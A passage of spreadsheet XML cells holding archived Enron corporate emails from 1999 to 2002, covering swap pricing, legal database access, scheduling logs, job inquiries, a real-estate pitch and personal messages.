vol skew curve does not generate arbitrage opportunities in a strip of option _x000D_
prices._x000D_
_x000D_
If you have questions or want to discuss implementation, please give me a _x000D_
call._x000D_
_x000D_
Bob Lee_x000D_
x35163 </t>
  </si>
  <si>
    <t>Wed, 26 Jul 2000 06:04:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'heather.kendall@enron.com', 'denae.umbower@enron.com', 'jim.schwieger@enron.com', 'clayton.vernon@enron.com', 'kimberly.hillis@enron.com', 'patricia.tlapek@enron.com', 'elsa.piekielniak@enron.com', 'janet.dietrich@enron.com', 'julie.gomez@enron.com', 'robert.lloyd@enron.com', 'sunil.dalal@enron.com', 'kenny.soignet@enron.com', 'keith.holst@enron.com', 'scott.neal@enron.com', 'kenneth.shulklapper@enron.com', 'chris.connelly@enron.com', 'marc.horowitz@enron.com', 'per.sekse@enron.com', 'fred.lagrasta@enron.com', 'frank.hayden@enron.com', 'berney.aucoin@enron.com', 'joseph.hrgovcic@enron.com', 'colleen.sullivan@enron.com', 'daniel.diamond@enron.com', 'lee.papayoti@enron.com', 'jean.mrha@enron.com', 'jeffrey.shankman@enron.com', 'phillip.allen@enron.com', 'liz.taylor@enron.com', 'adam.wais@enron.com', 'paul.lucci@enron.com', 'matthew.lenhart@enron.com', 'thomas.martin@enron.com', 'calvin.johnson@enron.com', 'robert.shiring@enron.com', 'chris.foster@enron.com', 'brian.hoskins@enron.com', 'hunter.shively@enron.com', 'jennifer.fraser@enron.com', 'sandra.brawner@enron.com', 'nicole.la@enron.com', 'michael.cowan@enron.com', 'john.arnold@enron.com'})</t>
  </si>
  <si>
    <t>AGA for 7/21/00 is 54</t>
  </si>
  <si>
    <t xml:space="preserve">AGA for 7/21/00 is 54_x000D_
</t>
  </si>
  <si>
    <t>Fri, 17 Dec 1999 07:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>PSE Swap transaction</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 12/17/99 _x000D_
03:22 PM ---------------------------_x000D_
_x000D_
_x000D_
Jarek Astramowicz_x000D_
12/12/99 05:55 PM_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: PSE Swap transaction_x000D_
_x000D_
Vicek,_x000D_
_x000D_
po tym jak nasi koledzy z FX Desk i Interest Rate Desk troche nas osmieszyli _x000D_
cytujac wysokie ceny na FX i twierdzac, ze nie ma rynku na CPI hedge, _x000D_
probujemy uratowac twarz przed PSE, ktora otrzymala dwa wiazace cytaty cenowe _x000D_
od JP Morgan and Morgan Stanley._x000D_
_x000D_
Jakakolwiek pomoc z Twojej strony bedzie tym bardziej cenna. Na dzien _x000D_
dzisiejszy wyglada, ze moze uda nam sie to zrobic z PSE ale dopiero w _x000D_
styczniu. Wartosc transakcji dla nas zmniejszy sie do prawie zera (musimy _x000D_
nadrobic w oczach PSE) i dlatego walczymy o kazdego $$$$ w NPV._x000D_
_x000D_
Dzieki - Jarek._x000D_
---------------------- Forwarded by Jarek Astramowicz/WAR/ECT on 99-12-13 _x000D_
01:50 ---------------------------_x000D_
_x000D_
_x000D_
Sidney Cox_x000D_
99-12-07 21:45_x000D_
To: Vince J Kaminski/HOU/ECT@ECT_x000D_
cc: Jarek Astramowicz/WAR/ECT@ECT, Jarek Dybowski/WAR/ECT@ECT _x000D_
Subject: PSE Swap transaction_x000D_
_x000D_
Vince, _x000D_
_x000D_
We are still trying to work the PSE swap transaction, now that the forex desk _x000D_
has been able to find a fix for CPI in the market. _x000D_
_x000D_
Further to my voicemail, our colleagues in credit are calculating the reserve _x000D_
on the PSE swap.  They are currently using 9.5% fixed based on the 1 year _x000D_
implied volatility.  Volatility of USD/DM has been in the range of between 7% _x000D_
and 11%.  Can one of your research staff justify a suitable 20 year _x000D_
volalatility number for USD/Euro.  Ideally, we would like a fast turnaround.  _x000D_
_x000D_
In addition, is there someone who could consider the correlation between US _x000D_
CPI and the $/euro exchange rate.  The credit guys are currently assuming _x000D_
that there is no correlation and may consequently be double dipping the _x000D_
credit reserve on this basis too.  _x000D_
_x000D_
Grateful for any help or suggestions you could provide. _x000D_
_x000D_
Sid _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 28 Nov 2000 09:59:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">GT_x000D_
_x000D_
I was actually in Spain all of Thanksgiving week.  Took a little vacation _x000D_
time.    That game sounds like it was an awesome one.  Nothing better than _x000D_
beating the f#$% out of the ags.  What's going on with you brother.  _x000D_
_x000D_
G_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	"Townsend, George" &lt;gtownsend@manorisd.net&gt;_x000D_
	11/21/2000 10:02 AM_x000D_
		 _x000D_
		 To: "'gerald nemec'" &lt;gnemec@ect.enron.com&gt;_x000D_
		 cc: _x000D_
		 Subject: _x000D_
_x000D_
_x000D_
G,_x000D_
_x000D_
Are you coming to the game? Let me know._x000D_
_x000D_
GT_x000D_
</t>
  </si>
  <si>
    <t>Sun, 29 Apr 2001 05:51:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Issues</t>
  </si>
  <si>
    <t xml:space="preserve">Here are the issues I see with their draft:_x000D_
_x000D_
Does not allow for us to sell them power, only buy their power and sell to _x000D_
others. This means that we can't sell them power until we get the full _x000D_
contract in place._x000D_
_x000D_
Fuel transactions include fuel oil, and I thought we weren't managing fuel _x000D_
oil._x000D_
_x000D_
Incentive fee (in main contract) defined to only include the sale of gas._x000D_
_x000D_
Doesn't include the language we need for internal approvals._x000D_
_x000D_
Payment section doesn't address payment for sale of power to them from the _x000D_
market._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 10 Aug 1999 08:43:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'brent.hendry@enron.com', 'mark.taylor@enron.com', 'shari.stack@enron.com'})</t>
  </si>
  <si>
    <t>Re: Financial products for Brazilian trading</t>
  </si>
  <si>
    <t xml:space="preserve">Attached is the first draft for Gary's group._x000D_
Brent:  I'll give you a call on Wednesday._x000D_
---------------------- Forwarded by Sara Shackleton/HOU/ECT on 08/10/99 03:40 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Jaime Gualy_x000D_
08/10/99 02:17 PM_x000D_
To: Sara Shackleton/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re: Financial products for Brazilian trading  _x000D_
_x000D_
Try this text version_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 27 Sep 2000 10:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Electricity Deregulation Report Card</t>
  </si>
  <si>
    <t xml:space="preserve">I think I confirmed for this already, but could you check and put on my _x000D_
calendar and put this in the meeting file._x000D_
----- Forwarded by Steven J Kean/NA/Enron on 09/27/2000 05:36 PM -----_x000D_
_x000D_
	Sherri Sera_x000D_
	09/05/2000 10:07 AM_x000D_
		 _x000D_
		 To: Steven J Kean/NA/Enron@Enron_x000D_
		 cc: Ginger Dernehl/NA/Enron@Enron_x000D_
		 Subject: Electricity Deregulation Report Card_x000D_
_x000D_
Steve, I spoke with Ginger about your availability to deliver a keynote _x000D_
address at a Maguire Energy Institute conference on "Electricity Deregulation _x000D_
Report Card" on November 1.  Jeff is on this board, and they asked us if we _x000D_
could enlist Ken Lay to deliver this keynote.  Ken is scheduled to be at a _x000D_
board meeting in Washington this date, so is not available.   I suggested _x000D_
that you may be a suitable replacement, and they are very interested in the _x000D_
prospect of your participation._x000D_
_x000D_
The link below is to the website for this conference, and the keynote would _x000D_
be delivered from 1:00p-1:30p, immediately following the luncheon.  Please _x000D_
let me know if you are available and willing to deliver this keynote; I would _x000D_
appreciate a response today if possible._x000D_
_x000D_
Thanks, SRS_x000D_
---------------------- Forwarded by Sherri Sera/Corp/Enron on 09/05/2000 _x000D_
09:49 AM ---------------------------_x000D_
_x000D_
_x000D_
"Mesch, Allen" &lt;amesch@mail.cox.smu.edu&gt; on 09/05/2000 09:34:25 AM_x000D_
To: "Jeffrey K. Skilling (E-mail)" &lt;jskilli@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: Electricity Deregulation Report Card_x000D_
_x000D_
_x000D_
Sherri,_x000D_
_x000D_
The link to the Maguire Energy Institute's "Electricity Deregulation Report_x000D_
Card" is http://maguireenergy.cox.smu.edu/programs/fallconf.html_x000D_
_x000D_
Thanks for your help._x000D_
_x000D_
Allen Mesch_x000D_
Director_x000D_
Maguire Energy Institute_x000D_
Edwin L. Cox School of Business_x000D_
Southern Methodist University_x000D_
PO Box 750333_x000D_
Dallas, TX  75275-0333_x000D_
_x000D_
Phone: 214-768-3692_x000D_
Fax: 214-768-4099_x000D_
E-mail: amesch@mail.cox.smu.edu_x000D_
Internet Site: http://maguireenergy.cox.smu.edu_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Feb 2001 09:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: full time analysts opp.</t>
  </si>
  <si>
    <t xml:space="preserve">Mike and Mark - -_x000D_
_x000D_
Would you 2 guys telephone interview him?  Thanks_x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Lexi Elliott                           02/09/2001 09:51 AM_x000D_
	_x000D_
_x000D_
To: Richard Causey/Corp/Enron@ENRON_x000D_
cc: Mike Deville/HOU/ECT@ECT, Sally Beck/HOU/ECT@ECT, Mark E _x000D_
Lindsey/GPGFIN/Enron@ENRON _x000D_
_x000D_
Subject: full time analysts opp._x000D_
_x000D_
This candidate is not eligible for an internship.  If you are interested in _x000D_
him, we can arrange to bring him to Houston for interviews._x000D_
_x000D_
Please let me know if you are interested._x000D_
_x000D_
lexi_x000D_
_x000D_
---------------------- Forwarded by Lexi Elliott/NA/Enron on 02/09/2001 09:56 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
"Andrew Haryono" &lt;tunk@mail.utexas.edu&gt; on 02/07/2001 09:39:06 PM_x000D_
To: &lt;lexi.elliott@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: full time analysts opp._x000D_
_x000D_
_x000D_
_x000D_
??????????Dear Lexi,  _x000D_
?????????????????????????  my name is Andrew Haryono.? I am a UT student _x000D_
majoring in Professional  Program in Accounting.?I will be graduating this _x000D_
May 2001 with a MPA  degree.??I will also be sitting for the CPA exam this _x000D_
May.? Even  though I have an audit background,?my career interest is to do _x000D_
financial  and accounting analysis.? The analyst's job description at Enron _x000D_
matches  perfectly with my career interest.? I signed up for the internship  _x000D_
opportunity through the careerportal system, because I could not find any _x000D_
full  time opportunity. As for now, I have not received answer from Enron.? I _x000D_
am  writing to ask further about the?career opportunity  with?Enron._x000D_
????????My questions  are:_x000D_
1)? Is it possible to turn this analyst?internship  opportunity into _x000D_
full-time permanent opportunity?? _x000D_
2)??If that's not possible would you have opening  for me in the near future?_x000D_
??? I am reattaching my resume.? Thank you  and I look forward?to hearing _x000D_
from you._x000D_
?_x000D_
?_x000D_
Sincerely,_x000D_
?_x000D_
Andrew Haryono_x000D_
 - resume.doc_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 03:44:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>EOL</t>
  </si>
  <si>
    <t>Mark,_x000D_
_x000D_
The scrutiny that is now falling on online trading platforms means that we _x000D_
need to stay ahead on this issue here on the Hill. I am concerned that _x000D_
Congress will uncover a significant regulatory gap between FERC jurisdiction _x000D_
and CFTC jurisdiction over online OTC activities.  Unfortunately, I am _x000D_
lacking in my knowledge of regulatory structures for our energy products, but _x000D_
I am confident that I know more than our lobbyists (they still don't know the _x000D_
difference between an exchange and Enron Online).  Our lobbyists are eager to _x000D_
deflect this scrutiny, but it is not clear they know what they are deflecting._x000D_
_x000D_
Is there a way to compare and contrast the differences in various forms of _x000D_
regulation of the CFTC and the FERC so we coan identify the "gap" (if it _x000D_
exists at all) and how Congress may attempt to fill the gap.  Are there _x000D_
lessons to be learned from other OTC products and exchange traded products _x000D_
(securities, banking, commodities)?  For example, does the FERC have _x000D_
jurisdiction to require licenced power marketers to deal only with _x000D_
counterparties that retain certian credit quality, or maintain certain _x000D_
reserves to back traded positions, increase reporting of trading activities?  _x000D_
As you can tell I know enough to get myself in trouble._x000D_
_x000D_
call me so we can talk furt.her</t>
  </si>
  <si>
    <t>Fri, 17 Mar 2000 07:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'marie.heard@enron.com', 'louise.kitchen@enron.com', 'frank.davis@enron.com', 'sheri.thomas@enron.com', 'dale.neuner@enron.com', 'molly.harris@enron.com', 'carol.clair@enron.com', 'edmund.cooper@enron.com', 'tom.moran@enron.com', 'david.forster@enron.com', 'lisa.gillette@enron.com', 'debbie.brackett@enron.com', 'mark.taylor@enron.com', 'melba.lozano@enron.com', 'leslie.hansen@enron.com'})</t>
  </si>
  <si>
    <t>ENA Legal Online Trading Database</t>
  </si>
  <si>
    <t xml:space="preserve">I have developed a database in which I keep track of the counterparties Legal _x000D_
has approved, any supporting rationale for approval of each counterparty (I _x000D_
'm giving away my secret that I just don't approve them on on pure whim!) and _x000D_
the products such counterparties are approved to trade.  Additionally, at the _x000D_
bottom of each entry there is a listing of any amendment to the Password _x000D_
Application, ETA , GTC, or any other online documentation._x000D_
_x000D_
The information for the financial products is pretty accurate (I may have _x000D_
missed an entry here or there in trying to enter 6 months of memos and excel _x000D_
spreadsheets.  If I have missed a counterparty let me know).  The information _x000D_
for Power has been updated only since this database was in production, about _x000D_
6-7 weeks ago.  I am going to have to go back and input the power data from _x000D_
the original approval lists._x000D_
_x000D_
As for gas trading and emerging products, we have never yet had a _x000D_
counterparty that we have had an issue with, so no information has been _x000D_
entered for those products. You should count them as being approved for _x000D_
everything.  Eventually, if we continue not to use those dropdowns, I will _x000D_
delete them._x000D_
_x000D_
I don't know if you will find this information helpful or not, take a look _x000D_
and I will be glad to hear any input.  Obviously, we are all working out the _x000D_
kinks and finding out what is useful and what is not useful as we go along, _x000D_
so this database may evolve over time._x000D_
_x000D_
The only people who should have change access are the Legal team (Mike _x000D_
Neves:  Mark Taylor, Carol St Clair, Leslie Hansen, Marie Heard and myself).  _x000D_
Let me know if you have change access by mistake._x000D_
_x000D_
On a closing note, please try to keep the information in the database _x000D_
confidential to the group we have granted view access to. Do not forward this _x000D_
email on to anyone as it will grant access without my approval.  Much _x000D_
thanks!   _x000D_
</t>
  </si>
  <si>
    <t>Mon, 16 Apr 2001 07:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/16/01; HourAhead hour: 15;  &lt;CODESITE&gt;</t>
  </si>
  <si>
    <t>Start Date: 4/16/01; HourAhead hour: 15;  No ancillary schedules awarded.  No _x000D_
variances detected._x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final _x000D_
Schedules\2001041615.txt</t>
  </si>
  <si>
    <t>Fri, 15 Dec 2000 09:05:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Apology</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 12/15/2000 _x000D_
05:06 PM ---------------------------_x000D_
_x000D_
_x000D_
KhairuddinBMJaafar@petronas.com.my on 12/12/2000 12:45:38 AM_x000D_
To: vkamins@ect.enron.com_x000D_
cc:  _x000D_
Subject: Apology_x000D_
_x000D_
_x000D_
Dear Sir,_x000D_
_x000D_
I would like to apologize for the mistake in my previous email. Please find_x000D_
the copy of the letter mentioned earlier in this email. Again,  I'm sorry_x000D_
for the inconvenience._x000D_
_x000D_
Thank you._x000D_
_x000D_
Yours sincerely,_x000D_
_x000D_
Khairuddin Jaafar_x000D_
_x000D_
(See attached file: Enron.lwp)_x000D_
_x000D_
 DISCLAIMER  : This e-mail and any files transmitted with it ("Message")_x000D_
 is  intended  only  for the use of the recipient(s) named above and may_x000D_
 contain  confidential  information.   You  are hereby notified that the_x000D_
 taking  of  any action in reliance upon, or any review, retransmission,_x000D_
 dissemination, distribution, printing or copying of this Message or any_x000D_
 part thereof by anyone other than the intended recipient(s) is strictly_x000D_
 prohibited.  If  you  have  received  this Message in error, you should_x000D_
 delete this Message immediately and advise the sender by return e-mail._x000D_
 Opinions, conclusions and other information in this Message that do not_x000D_
 relate  to  the official business of PETRONAS or its Group of Companies_x000D_
 shall be understood as neither given nor endorsed by PETRONAS or any of_x000D_
 the companies within the Group._x000D_
_x000D_
_x000D_
(Embedded image moved to file: pic25324.pcx)_x000D_
 - Enron.lwp_x000D_
 - pic25324.pcx_x000D_
</t>
  </si>
  <si>
    <t>Thu, 26 Apr 2001 04:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Start Date: 4/26/01; HourAhead hour: 12;  HourAhead schedule download failed. _x000D_
Manual intervention required.</t>
  </si>
  <si>
    <t>Fri, 1 Feb 2002 06:37:20 -0800 (PST)</t>
  </si>
  <si>
    <t>Start Date: 2/1/02; HourAhead hour: 5;</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
Start Date: 2/1/02; HourAhead hour: 5;  No ancillary schedules awarded.  No variances detected. _x000D_
_x000D_
    LOG MESSAGES:_x000D_
_x000D_
PARSING FILE --&gt;&gt; O:\Portland\WestDesk\California Scheduling\ISO Final Schedules\2002020105.txt</t>
  </si>
  <si>
    <t>Tue, 21 Nov 2000 08:15:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'jcmayers@earthlink.net'})</t>
  </si>
  <si>
    <t>Visit</t>
  </si>
  <si>
    <t>Uncle Clark,_x000D_
_x000D_
It just dawned on my that I never really thanked you for our visit.  All four _x000D_
of us had a great time.  It was so good to see all of you and especially _x000D_
great to see the kids get together and have so much fun.  I really regret _x000D_
that as I was growing up, we really did not see that much of each other( and _x000D_
by we, I mean the Kansas group and the Girons).  But even given that, I feel _x000D_
as if you all have been part of my life and every time we get together it's _x000D_
like we have always spent alot of time together.  I guess that's why they _x000D_
call it family.  So once again, thanks for your hospitality and we look _x000D_
forward to our next get together, wherever and whenever it may be._x000D_
_x000D_
Darron</t>
  </si>
  <si>
    <t>Fri, 23 Jun 2000 04:52:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Average Prices</t>
  </si>
  <si>
    <t>The Index for a month shall be the arithmetic average of the high and low _x000D_
prices per Short Ton for such calendar month _x000D_
of 26 Lb. Semichemical Medium, stated in U.S. Dollars, delivered in the _x000D_
Eastern U.S., published under the headings:  _x000D_
"Price Watch: Paperboard/Packaging: Grade: Corrugating medium (26-lb): _x000D_
Semichemical, East" in the issue of Pulp &amp; _x000D_
Paper Week that reports prices effective for such calendar month.</t>
  </si>
  <si>
    <t>Fri, 29 Sep 2000 10:31:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cantekin@mail.utexas.edu'})</t>
  </si>
  <si>
    <t>RE: part-time work</t>
  </si>
  <si>
    <t xml:space="preserve">Cantekin_x000D_
_x000D_
We shall get back to you when I return from Europe in a week._x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Cantekin Dincerler" &lt;cantekin@mail.utexas.edu&gt; on 09/25/2000 12:46:51 PM_x000D_
Please respond to &lt;cantekin@mail.utexas.edu&gt;_x000D_
To: &lt;Vince.J.Kaminski@enron.com&gt;_x000D_
cc:  _x000D_
Subject: RE: part-time work_x000D_
_x000D_
_x000D_
Vince,_x000D_
_x000D_
I have received the full-time offer package from Associate &amp; Analyst Program_x000D_
last week. Apparently they have pretty tight deadlines. Because of a certain_x000D_
clause in the contract, I may have to give them an answer by October 16th._x000D_
Since we discussed this before I left Enron, I felt it would be a good idea_x000D_
to inform you of the recent developments._x000D_
_x000D_
I am looking forward to hearing from you soon regarding both part-time and_x000D_
full-time employment opportunities with the Research Group._x000D_
_x000D_
Best,_x000D_
_x000D_
 ---------oOOo-----oOOo----------_x000D_
Cantekin Dincerler_x000D_
_x000D_
Doctoral Candidate_x000D_
The University of Texas at Austin_x000D_
Graduate School of Business_x000D_
Department of Finance_x000D_
office: (512) 471-1676_x000D_
fax   : (512) 471-5073_x000D_
home  : (512) 472-5356_x000D_
cell  : (512) 680-5355_x000D_
http://uts.cc.utexas.edu/~cantekin_x000D_
 -------------oooO-----Oooo----------_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Nov 2001 06:12:21 -0800 (PST)</t>
  </si>
  <si>
    <t>Electronic Pay Check</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
We are currently experiencing a problem with our ability to display pay checks.  We are addressing the issue at this time and will provide you with updates as we have additional information._x000D_
_x000D_
Contact:_x000D_
_x000D_
Contact:_x000D_
_x000D_
Contact Information:_x000D_
_x000D_
ISC Customer Care _x000D_
_x000D_
713-345-4727_x000D_
_x000D_
 	  	</t>
  </si>
  <si>
    <t>Tue, 20 Nov 2001 14:32:59 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'paul.miller@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'stanley.horton@enron.com', 'bill.cordes@enron.com'})</t>
  </si>
  <si>
    <t>Future Business Opportunities with Illinois Power</t>
  </si>
  <si>
    <t xml:space="preserve">Stan and Bill,_x000D_
_x000D_
I just wanted to briefly call to your attention that the merger between Dynegy and Enron could bring about greater business opportunities between Northern Border Pipeline and Illinois Power.  Illinois Power serves 650,000 natural gas and electricity customers in a 15,000 square-mile territory across Illinois.  _x000D_
_x000D_
Illinois Power currently holds a 40 MMbtu/d contract on MGT that will expire in December of 2002.  This contract serves a power plant off their system near Urbana, IL.  We hope to continue and expand this relationship with MGT. _x000D_
_x000D_
Northern Border does not connect with Illinois Power but is within 10 - 15 miles of a portion of their system in north-central Illinois.  We have begun discussions with Illinois Power about developing a project to access this market._x000D_
_x000D_
Paul _x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 13 Dec 2001 10:47:54 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'elizabeth.labanowski@enron.com'})</t>
  </si>
  <si>
    <t>RE: OPINION</t>
  </si>
  <si>
    <t>How late will you be here today?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Labanowski, Elizabeth  _x000D_
Sent:	Thursday, December 13, 2001 12:47 PM_x000D_
To:	Mann, Kay_x000D_
Subject:	OPINION_x000D_
_x000D_
I WOULD PREFER TO REEXECUTE IF THERE IS TIME.  OTHERWISE, YOU CAN SUBSTITUTE PAGES AND GIVE ME A FULL COPY.  THANKS.</t>
  </si>
  <si>
    <t>Mon, 11 Sep 2000 09:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Westgate Proforma-Phillip Allen.xls</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Phillip K Allen/HOU/ECT on 09/11/2000 _x000D_
04:57 PM ---------------------------_x000D_
_x000D_
_x000D_
"George Richards" &lt;cbpres@austin.rr.com&gt; on 09/08/2000 05:21:49 AM_x000D_
Please respond to &lt;cbpres@austin.rr.com&gt;_x000D_
To: "Phillip Allen" &lt;pallen@enron.com&gt;_x000D_
cc: "Larry Lewter" &lt;retwell@mail.sanmarcos.net&gt; _x000D_
Subject: Westgate Proforma-Phillip Allen.xls_x000D_
_x000D_
_x000D_
Enclosed is the preliminary proforma for the Westgate property is Austin_x000D_
that we told you about.  As you can tell from the proforma this project_x000D_
should produce a truly exceptional return of over 40% per year over 3 years._x000D_
This is especially attractive when the project is in a market as strong as_x000D_
Austin and we are introducing new product that in a very low price range for_x000D_
this market.  This is the best project in terms of risk and reward that we_x000D_
have uncovered to date in the Austin market._x000D_
The project does have approved zoning and will only require a site plan.  As_x000D_
it is in the "Smart Growth Corridor" area designated by the City of Austin_x000D_
for preferred development, this will be fast tracked and should be complete_x000D_
in less than 6 months.  Additionally, many of the current and more severe_x000D_
water treatment ordinances have been waived.  I have estimated the lot_x000D_
improvement costs based on a 28 lot development we investigated in North_x000D_
Austin, which included a detention/retention and filtration pond and street_x000D_
widening.  Even though this property is not likely to require street_x000D_
widening and will have less of a detention/retention and filtration pond_x000D_
requirement, I used this data to be cautious._x000D_
 The Lone Star gas line easement in the lower portion of the property is not_x000D_
expected to impact sales significantly.  Other projects have been quite_x000D_
successful with identical relationships to this pipeline, such as the_x000D_
adjoining single family residential and a project at St. Edwards University._x000D_
As with most infill projects, the quality of the surrounding neighborhoods_x000D_
is uneven.  We have included a fence around the entire property, but may_x000D_
only put it on Westgate and Cameron Loop.  Gated communities are far_x000D_
preferred so this is a good idea for both screening and current buyer_x000D_
preferences._x000D_
The seller accepted our offer Thursday evening with a price of $680,000 and_x000D_
an extended escrow.  This will enable us to probably obtain an approved site_x000D_
plan before closing on the contract, which will mean that we can close into_x000D_
an A&amp;D Loan rather than into a land loan and then an improvement loan._x000D_
This analysis shows your investment at $700,000 for a 50% interest in the_x000D_
profits of the project.  As we discussed in San Marcos, we can also discuss_x000D_
having you invest only in the lots, sell the lots to the construction entity_x000D_
with your profit in the lot.  I believe this would facilitate the use of a_x000D_
1031 Exchange of the proceeds from this deal into another project that is a_x000D_
rental deal or at least into the land for a rental project that would then_x000D_
be the equity for that project.  You would need to discuss this with an_x000D_
exchange expert first.  Larry Lewter knows an expert in the field in San_x000D_
Antonio if you do not know anyone._x000D_
I will send you a package on the property that was prepared by the broker,_x000D_
by Airborne Express today for Saturday delivery._x000D_
Once you have read the package and reviewed this proforma, we would want to_x000D_
schedule a tour of the site and the area.  Please get back to me as soon as_x000D_
your schedule permits regarding the site visit and feel free to call at any_x000D_
time.  You can reach me over the weekend and in the evening at either_x000D_
512-338-1119 or 512-338-1110.  My cell phone is 512-748-7495 and the fax is_x000D_
512-338-1103.   I look forward to hearing from you and to working with you_x000D_
on this project that is sure to be a major winner._x000D_
I regret that it took so long to get back to you, but we had some unusual_x000D_
events these past few weeks.  A small freakish wind storm with severe 60+mpg_x000D_
downdrafts hit the South part of Austin where we are building 10 town homes._x000D_
One of these units had just had the roof decked with the siding scheduled to_x000D_
start the next day.  The severe downdraft hitting the decked roof was enough_x000D_
to knock it down.  The City shut down the project for a week and it took_x000D_
another week to get every thing back on tract.  Then last week I had to take_x000D_
my wife  to emergency.  She has a bulge in the material between the vertebra_x000D_
in her spine and it causes her extreme pain and has kept her bedridden this_x000D_
past week..  There is nothing like having your wife incapacitated to realize_x000D_
the enormous number of things she does everyday.   Fortunately, it looks as_x000D_
if she will be ok in the long run._x000D_
George W. Richards_x000D_
Creekside Builders, LLC_x000D_
_x000D_
_x000D_
 - Westgate Proforma-Phillip Allen.xls_x000D_
</t>
  </si>
  <si>
    <t>Mon, 26 Feb 2001 04:38:00 -0800 (PST)</t>
  </si>
  <si>
    <t>RE: See</t>
  </si>
  <si>
    <t xml:space="preserve">So glad that I received that e-mail.? I have been waiting on pins and needles _x000D_
for a meaningful and heartfelt message....oh well, maybe next time._x000D_
_x000D_
Just kidding.? How is your day going?? I actually slept good last night.? _x000D_
Isn't amazing what a good nights sleep can do for you?? Maybe the anxiety is _x000D_
going away.? Sophie actually let me sleep until 5 am and then she couldn't _x000D_
hold it anymore.? Gosh, I just love having a dog that is 13 years old._x000D_
_x000D_
Had a Dr's appt this morning and just got back from and I'm trying to get _x000D_
back into work.? Why can't we all just be self-made millionaires and get to _x000D_
play all day?_x000D_
_x000D_
Any word from David? _x000D_
_x000D_
-----Original Message----- _x000D_
From: Gerald.Nemec@enron.com [mailto:Gerald.Nemec@enron.com] _x000D_
Sent: Monday, February 26, 2001 9:30 AM _x000D_
To: Waldrop, Barbara (CBI-Houston) _x000D_
Subject: Re: See _x000D_
_x000D_
_x000D_
Testing.? Testing.? This is a test of the Waldrop email systems.? This is _x000D_
only a test.? If this were a real email, there would be a much more _x000D_
meaningful and heartfelt message contained herein. _x000D_
_x000D_
_x000D_
_x000D_
??????????????????????????????????????????????????????????????????????????????_x000D_
?????????????????????????????????????? _x000D_
??????????????????? _x000D_
"Waldrop,?????????????????????????????????????????????????????????????????????_x000D_
?????????????????? _x000D_
??????????????????? Barbara??????????????? To:???? "'Gerald.Nemec@enron.com'" _x000D_
&lt;Gerald.Nemec@enron.com&gt;?????????????? _x000D_
??????????????????? (CBI-Houston)"???????? _x000D_
cc:?????????????????????????????????????????????????????????????????????? _x000D_
??????????????????? &lt;Barbara.Waldro??????? Subject:???? _x000D_
See????????????????????????????????????????????????????????? _x000D_
??????????????????? _x000D_
p@cox.com&gt;????????????????????????????????????????????????????????????????????_x000D_
?????????????????? _x000D_
??????????????????????????????????????????????????????????????????????????????_x000D_
?????????????????????????????????????? _x000D_
??????????????????? _x000D_
02/23/2001????????????????????????????????????????????????????????????????????_x000D_
?????????????????? _x000D_
??????????????????? 11:27 _x000D_
AM????????????????????????????????????????????????????????????????????????????_x000D_
???????????? _x000D_
??????????????????????????????????????????????????????????????????????????????_x000D_
?????????????????????????????????????? _x000D_
??????????????????????????????????????????????????????????????????????????????_x000D_
?????????????????????????????????????? _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
See, I do work for Cox! _x000D_
_x000D_
Barbara Waldrop _x000D_
Business Manager _x000D_
Cox Radio-Houston _x000D_
1990 Post Oak Blvd, Ste 2300 _x000D_
Houston, TX? 77056 _x000D_
barbara.waldrop@cox.com _x000D_
713-963-1230 _x000D_
713-622-6708 (fax) _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 20 Apr 2001 00:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Sierra Pacific Power/Nevada Power</t>
  </si>
  <si>
